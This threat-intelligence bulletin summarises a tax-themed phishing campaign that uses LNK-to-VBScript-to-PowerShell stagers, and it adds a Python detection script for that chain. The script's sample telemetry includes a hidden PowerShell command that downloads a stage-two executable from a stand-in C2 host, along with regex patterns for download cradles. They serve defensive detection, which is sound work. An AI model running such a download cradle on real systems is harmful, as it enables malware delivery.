"Tactical Octopus" Cybercriminals Use Tax-themed Phishing for Malware Distribution
Category: Threat Actor Activity | Industry: Global | Level: Tactical | Source: Securonix
A group of hackers known as "TACTICAL#OCTOPUS" is using tax-themed phishing scams to distribute malware, according to researchers from Securonix Threat Labs. Activity observed from the group over the past several months shows the hackers using employee tax documents such as W-2s, I-9s, and real estate purchase contracts as lures to encourage people to download malware. The attack chain starts with a compressed zip file containing a shortcut file, which triggers multiple VBScript and PowerShell stagers that retrieve additional payloads from the C2 server. The malware then grants the hackers broad access to the victims' devices. The researchers identified two IP addresses associated with the attack as belonging to Petersburg Internet Network Ltd. in Russia, while the third was linked to Des Capital B.V., a US-based company. "Two of three IP addresses identified in the attack were registered to Petersburg Internet Network Ltd. in the Russian Federation. This could indicate Russian origins; however, the possibility of false flag operations cannot be ruled out at this point," as assessed by Securonix. Based on the recent samples analyzed by Securonix, the campaign is deemed active. Although the threat actors use a common initial access technique with shortcut files, the sophisticated, heavily obfuscated PowerShell and VBScript code, specifically designed to evade antivirus detection, sets this campaign apart and highlights the importance of continued monitoring.
Anvilogic Use Cases:
- Suspicious Payload Initiated from PowerShell
- Invoke-WebRequest Command
- Wscript/Cscript Execution
- Network Connection with Suspicious Folder
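The stager chain described above (shortcut file, then wscript/cscript running a VBScript stager, then PowerShell fetching the next stage with Invoke-WebRequest, then an outbound connection from a payload dropped in a staging folder) maps directly onto the four use cases listed. The following is an added illustration of that detection logic, not code from Securonix or Anvilogic: it runs simple rules over a handful of constructed process-creation and network-connection events and correlates parent/child relationships so that a process matching several rules is rated higher. The staging directories, the command-line patterns and all sample paths and hosts are assumptions chosen for the example and should be tuned to the environment.

```python
"""Added example: correlate process-creation and network-connection telemetry to
flag the LNK -> wscript/cscript -> PowerShell download cradle -> C2 chain.
All events below are constructed for illustration; nothing here is a real IoC."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Event:
    kind: str               # "process" or "network"
    pid: int
    ppid: Optional[int]     # parent pid for process events, None for network events
    image: str              # executable path as an endpoint sensor would log it
    cmdline: str = ""       # full command line (process events only)
    dest: str = ""          # destination host:port (network events only)


SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Staging folders commonly abused by script stagers (assumed list; tune per environment).
SUSPICIOUS_DIR = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.I)
# PowerShell download cradles, including the Invoke-WebRequest use case from the list above.
DOWNLOAD_CRADLE = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient", re.I)
# -e / -ec / -enc / -encodedcommand switches, a common way to hide the real command line.
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return {pid: [reasons]} for every process that matches at least one rule."""
    procs = {e.pid: e for e in events if e.kind == "process"}
    findings = {}

    def flag(pid, reason):
        findings.setdefault(pid, []).append(reason)

    for e in events:
        name = basename(e.image)
        if e.kind == "process":
            parent = procs.get(e.ppid)
            if name in SCRIPT_HOSTS:
                flag(e.pid, "wscript/cscript execution")
                if SUSPICIOUS_DIR.search(e.cmdline):
                    flag(e.pid, "script file in suspicious folder")
            if name in ("powershell.exe", "pwsh.exe"):
                if parent and basename(parent.image) in SCRIPT_HOSTS:
                    flag(e.pid, "powershell spawned by script host")
                if DOWNLOAD_CRADLE.search(e.cmdline):
                    flag(e.pid, "Invoke-WebRequest / download cradle")
                if ENCODED_FLAG.search(e.cmdline):
                    flag(e.pid, "encoded PowerShell command")
        elif e.kind == "network" and SUSPICIOUS_DIR.search(e.image):
            flag(e.pid, "network connection from suspicious folder")
    return findings


def severity(reasons) -> str:
    """Two or more independent rule hits on one process is treated as high."""
    return "high" if len(reasons) >= 2 else "medium"


# Constructed sample telemetry: one stager chain plus one benign PowerShell run.
SAMPLE_EVENTS = [
    Event("process", 100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event("process", 200, 100, r"C:\Windows\System32\wscript.exe",
          r'wscript.exe "C:\Users\alice\AppData\Local\Temp\W2_2022.vbs"'),
    Event("process", 300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'powershell.exe -w hidden -ep bypass -c "Invoke-WebRequest -Uri http://c2-placeholder.invalid/s '
          r'-OutFile C:\Users\alice\AppData\Local\Temp\stage2.exe"'),
    Event("process", 400, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell.exe -File C:\Scripts\backup.ps1"),
    Event("process", 500, 300, r"C:\Users\alice\AppData\Local\Temp\stage2.exe", "stage2.exe"),
    Event("network", 500, None, r"C:\Users\alice\AppData\Local\Temp\stage2.exe",
          dest="198.51.100.10:443"),  # placeholder (TEST-NET-2) address, not a real IoC
]

SAMPLE_FINDINGS = analyze(SAMPLE_EVENTS)

if __name__ == "__main__":
    for pid, reasons in sorted(SAMPLE_FINDINGS.items()):
        print(f"pid {pid} [{severity(reasons)}]: " + "; ".join(reasons))
```

Running the block prints three alerts (the script host, the PowerShell child and the dropped executable's outbound connection) and stays silent on the benign `-File` invocation; the benefit of correlating on parent pid is that `powershell.exe` spawned by `wscript.exe` is flagged even before the download cradle is parsed out of an obfuscated command line.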